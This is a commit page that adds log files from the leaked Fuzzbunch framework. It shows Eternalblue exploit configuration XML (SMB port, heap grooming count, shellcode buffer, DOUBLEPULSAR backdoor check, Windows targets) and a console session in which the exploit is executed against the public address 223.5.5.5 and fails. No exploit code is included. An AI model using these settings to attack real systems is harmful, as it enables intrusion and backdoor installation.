Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
18 changed files
with
1,149 additions
and
9 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
46 changes: 46 additions & 0 deletions
46
logs/Eternalblue-2.2.0.exe-2017-04-18.22.01.29.818000-InConfig.validate.xml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,46 @@ | ||
<t:config xmlns:t="urn:trch" id="0f38f55b6a88feccfb846d3d10ab4687e652e63e" configversion="2.2.0.0" name="Eternalblue" version="2.2.0" schemaversion="2.1.0"> | ||
<t:inputparameters> | ||
<t:parameter name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port" type="TcpPort" format="Scalar" hidden="true" valid="true"> | ||
<t:default>0</t:default> | ||
<t:value>0</t:value> | ||
</t:parameter> | ||
<t:parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true"> | ||
<t:default>60</t:default> | ||
<t:value>60</t:value> | ||
</t:parameter> | ||
<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true"> | ||
<t:default>192.168.1.1</t:default> | ||
<t:value>192.168.1.1</t:value> | ||
</t:parameter> | ||
<t:parameter name="TargetPort" description="Port used by the SMB service for exploit connection" type="TcpPort" format="Scalar" valid="true"> | ||
<t:default>445</t:default> | ||
<t:value>445</t:value> | ||
</t:parameter> | ||
<t:parameter name="VerifyTarget" description="Validate the SMB string from target against the target selected before exploitation." type="Boolean" format="Scalar" valid="true"> | ||
<t:default>false</t:default> | ||
<t:value>false</t:value> | ||
</t:parameter> | ||
<t:parameter name="VerifyBackdoor" description="Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts." type="Boolean" format="Scalar" valid="true"> | ||
<t:default>true</t:default> | ||
<t:value>true</t:value> | ||
</t:parameter> | ||
<t:parameter name="MaxExploitAttempts" description="Number of times to attempt the exploit and groom. Disabled for XP/2K3." type="U32" format="Scalar" valid="true"> | ||
<t:default>3</t:default> | ||
<t:value>3</t:value> | ||
</t:parameter> | ||
<t:parameter name="GroomAllocations" description="Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do." type="U32" format="Scalar" valid="true"> | ||
<t:default>12</t:default> | ||
<t:value>12</t:value> | ||
</t:parameter> | ||
<t:parameter name="ShellcodeBuffer" description="Shellcode buffer in hex (hint: use 'F:<FILENAME>' to load from file)" type="Buffer" format="Scalar" hidden="true" required="false"></t:parameter> | ||
<t:paramchoice name="Target" description="Operating System, Service Pack, and Architecture of target OS"> | ||
<t:default>WIN72K8R2</t:default> | ||
<t:value>WIN72K8R2</t:value> | ||
<t:paramgroup name="XP" description="Windows XP 32-Bit All Service Packs"></t:paramgroup> | ||
<t:paramgroup name="WIN72K8R2" description="Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs"></t:paramgroup> | ||
</t:paramchoice> | ||
</t:inputparameters> | ||
<t:outputparameters> | ||
<t:parameter name="DoublePulsarPresent" description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown" type="Boolean" format="Scalar"></t:parameter> | ||
</t:outputparameters> | ||
</t:config> |
46 changes: 46 additions & 0 deletions
46
logs/Eternalblue-2.2.0.exe-2017-04-18.22.01.29.908000-InConfig.xml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,46 @@ | ||
<t:config xmlns:t="urn:trch" id="0f38f55b6a88feccfb846d3d10ab4687e652e63e" configversion="2.2.0.0" name="Eternalblue" version="2.2.0" schemaversion="2.1.0"> | ||
<t:inputparameters> | ||
<t:parameter name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port" type="TcpPort" format="Scalar" hidden="true" valid="true"> | ||
<t:default>0</t:default> | ||
<t:value>0</t:value> | ||
</t:parameter> | ||
<t:parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true"> | ||
<t:default>60</t:default> | ||
<t:value>60</t:value> | ||
</t:parameter> | ||
<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true"> | ||
<t:default>192.168.1.1</t:default> | ||
<t:value>192.168.1.1</t:value> | ||
</t:parameter> | ||
<t:parameter name="TargetPort" description="Port used by the SMB service for exploit connection" type="TcpPort" format="Scalar" valid="true"> | ||
<t:default>445</t:default> | ||
<t:value>445</t:value> | ||
</t:parameter> | ||
<t:parameter name="VerifyTarget" description="Validate the SMB string from target against the target selected before exploitation." type="Boolean" format="Scalar" valid="true"> | ||
<t:default>false</t:default> | ||
<t:value>false</t:value> | ||
</t:parameter> | ||
<t:parameter name="VerifyBackdoor" description="Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts." type="Boolean" format="Scalar" valid="true"> | ||
<t:default>true</t:default> | ||
<t:value>true</t:value> | ||
</t:parameter> | ||
<t:parameter name="MaxExploitAttempts" description="Number of times to attempt the exploit and groom. Disabled for XP/2K3." type="U32" format="Scalar" valid="true"> | ||
<t:default>3</t:default> | ||
<t:value>3</t:value> | ||
</t:parameter> | ||
<t:parameter name="GroomAllocations" description="Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do." type="U32" format="Scalar" valid="true"> | ||
<t:default>12</t:default> | ||
<t:value>12</t:value> | ||
</t:parameter> | ||
<t:parameter name="ShellcodeBuffer" description="Shellcode buffer in hex (hint: use 'F:<FILENAME>' to load from file)" type="Buffer" format="Scalar" hidden="true" required="false"></t:parameter> | ||
<t:paramchoice name="Target" description="Operating System, Service Pack, and Architecture of target OS"> | ||
<t:default>WIN72K8R2</t:default> | ||
<t:value>WIN72K8R2</t:value> | ||
<t:paramgroup name="XP" description="Windows XP 32-Bit All Service Packs"></t:paramgroup> | ||
<t:paramgroup name="WIN72K8R2" description="Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs"></t:paramgroup> | ||
</t:paramchoice> | ||
</t:inputparameters> | ||
<t:outputparameters> | ||
<t:parameter name="DoublePulsarPresent" description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown" type="Boolean" format="Scalar"></t:parameter> | ||
</t:outputparameters> | ||
</t:config> |
Empty file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
[*] Connecting to target for exploitation. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
|
||
--[ Version 3.5.1 | ||
|
||
[*] Loading Plugins | ||
fb > AutoRun off | ||
[*] Autorun is OFF | ||
fb > use EternalBlue | ||
|
||
[!] Entering Plugin Context :: Eternalblue | ||
[*] Applying Global Variables | ||
|
||
fb Special (Eternalblue) > setg TargetIP 223.5.5.5 | ||
[+] Set TargetIP => 223.5.5.5 | ||
fb Special (Eternalblue) > execute | ||
|
||
[!] Preparing to Execute Eternalblue | ||
|
||
[*] Mode :: Delivery mechanism | ||
|
||
*0) FB Traditional deployment from within FUZZBUNCH | ||
1) DANE Forward deployment via DARINGNEOPHYTE | ||
|
||
[+] Run Mode: 0 | ||
|
||
|
||
Module: Eternalblue | ||
=================== | ||
|
||
Name Value | ||
---- ----- | ||
DaveProxyPort 0 | ||
NetworkTimeout 60 | ||
TargetIp 192.168.1.1 | ||
TargetPort 445 | ||
VerifyTarget False | ||
VerifyBackdoor True | ||
MaxExploitAttempts 3 | ||
GroomAllocations 12 | ||
ShellcodeBuffer | ||
Target WIN72K8R2 | ||
|
||
[*] Executing Plugin | ||
[!] Plugin failed | ||
[-] Error: Eternalblue Failed | ||
[-] Aborting script | ||
fb Special (Eternalblue) > echo Initializing Fuzzbunch v3.5.1 | ||
[*] Initializing Fuzzbunch v3.5.1 | ||
fb Special (Eternalblue) > echo Adding Global Variables | ||
[*] Adding Global Variables | ||
fb Special (Eternalblue) > setg Color True | ||
[+] Set Color => True | ||
fb Special (Eternalblue) > setg ShowHiddenParameters False | ||
[+] Set ShowHiddenParameters => False | ||
fb Special (Eternalblue) > setg NetworkTimeout 60 | ||
[+] Set NetworkTimeout => 60 | ||
fb Special (Eternalblue) > setg LogDir G:\logs | ||
[+] Set LogDir => G:\logs |
Oops, something went wrong.